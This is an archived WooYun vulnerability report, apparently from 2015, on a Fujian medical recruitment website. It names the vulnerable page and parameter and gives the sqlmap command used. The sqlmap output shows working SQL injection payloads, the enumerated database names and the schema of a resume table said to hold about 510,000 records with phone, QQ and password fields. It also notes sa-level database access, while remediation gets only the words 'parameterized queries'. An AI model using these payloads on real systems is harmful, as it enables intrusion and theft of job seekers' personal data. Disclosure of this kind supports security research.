乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-06: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-11-20: 厂商已经主动忽略漏洞,细节向公众公开
RT
福建省医疗人才服务中心(福建省医药人才网—www.fjyyrc.cn) 属于福建省食品药品监督管理局的人才就业服务单位,自2002年成立以来,已为20多万医药卫生相关人才进行全交流国性交流,超过1万家医药卫生单位通过福建省医药人才网进行招聘,并已取得良好的效果。注入位置:
http://www.fjyyrc.com/vipcxchk.asp
sqlmap.py -u "http://www.fjyyrc.com/vipcxchk.asp" --data "zt=88952634" --level 3 --risk 3 POST parameter 'zt' is vulnerable. Do you want to keep testing the others (if any)? [y/N] nsqlmap identified the following injection point(s) with a total of 165 HTTP(s) requests:---Parameter: zt (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause Payload: zt=-8890' OR 1027=1027 AND 'WqRH'='WqRH Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: zt=88952634' AND 7490=CONVERT(INT,(SELECT CHAR(113)+CHAR(122)+CHAR(106)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (7490=7490) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(107)+CHAR(113)+CHAR(113))) AND 'OMUT'='OMUT Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: zt=88952634';WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query) Payload: zt=88952634' AND 6112=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'ccxw'='ccxw---[00:39:53] [INFO] testing Microsoft SQL Server[00:39:54] [INFO] confirming Microsoft SQL Server[00:39:57] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASPback-end DBMS: Microsoft SQL Server 2005[00:39:57] [INFO] fetching database names[00:39:57] [INFO] the SQL query used returns 5 entries[00:39:58] [INFO] retrieved: master[00:39:58] [INFO] retrieved: model[00:40:01] [INFO] retrieved: msdb[00:40:01] [INFO] retrieved: tempdb[00:40:01] [INFO] retrieved: webfjyyrcavailable databases [5]:[*] master[*] model[*] msdb[*] tempdb[*] webfjyyrc
数据库:
数据量,51W份简历呢:
简历详细信息:
Database: webfjyyrcTable: person66[114 columns]+--------------------+---------------+| Column | Type |+--------------------+---------------+| administrator | bit || age | tinyint || availNotice | nvarchar || availOpts | tinyint || beizhu | ntext || birthday | tinyint || birthmonth | tinyint || birthyear | smallint || comid | nvarchar || daiyuyaoqiu | nvarchar || dianaLevel | tinyint || dianhua | nvarchar || dlcs | int || dlsj | smalldatetime || fazhanfangxiang | ntext || gerenzhuye | nvarchar || grtype | tinyint || huji | char || huji1 | nvarchar || hunyin | tinyint || id | int || ip | nvarchar || JFbirthday | nvarchar || JFcomName | nvarchar || JFcomSort | nvarchar || JFcomTar | nvarchar || JFdaiyu | nvarchar || JFdianhua | nvarchar || JFdizhi | nvarchar || JFdrzw | nvarchar || JFeduTime | nvarchar || JFeng | nvarchar || JFetc | ntext || JFetcJN | ntext || JFetclan1 | nvarchar || JFetclan2 | nvarchar || JFetcReq | ntext || JFgzjy | ntext || JFgzms | ntext || JFhkszd | nvarchar || JFhuji | nvarchar || JFhunyin | nvarchar || JFid | int || JFjobid1 | nvarchar || JFjobid2 | nvarchar || JFjsj | ntext || JFjsj0 | ntext || JFlan | nvarchar || JFlzyy | ntext || JFmqszd | nvarchar || JFqq | nvarchar || JFsex | nvarchar || JFshengao | nvarchar || JFview | tinyint || JFxqzw | nvarchar || JFxueli | nvarchar || JFxueli2 | nvarchar || JFxwdq | nvarchar || JFxwgw | nvarchar || JFzhengshu | nvarchar || JFzhicheng | nvarchar || jiaoyubeijing | ntext || jinengzhuanchang | ntext || jingyan | tinyint || jingyanshuoming | ntext || jlbm | bit || jobid | varchar || jsjshuiping | tinyint || l_OneAbility | tinyint || l_twoAbility | tinyint || language_one | tinyint || language_two | tinyint || llcs | int || lxbm | bit || mandarinLevel | tinyint || mbsys | tinyint || minzu | char || name | char || Negotiable | tinyint || otherLanguage | varchar || password | nvarchar || password2 | nvarchar || photo | char || photopb | tinyint || phototre | tinyint || pingjia | ntext || pr | int || provideHouseNeeded | tinyint || qq | nvarchar || s_PWL1 | nvarchar || s_PWL2 | char || s_PWL3 | char || selectedjob1 | nvarchar || shengao | smallint || tj | tinyint || tjr | nvarchar || useremail | nvarchar || username | nvarchar || workdata | smallint || worktype | tinyint || x_suozaidi | char || x_suozaidi1 | nvarchar || xgsj | smalldatetime || xingbie | bit || xueli | tinyint || xuexiao | nvarchar || yanzheng | tinyint || zazhi | bit || zcdata | smalldatetime || zhengshu1 | char || zhengshu2 | char || zhengshu3 | char || zhengshutre | tinyint || zhuanye | nvarchar |+--------------------+---------------+
dba权限,当前是sa:
参数化查询
未能联系到厂商或者厂商积极拒绝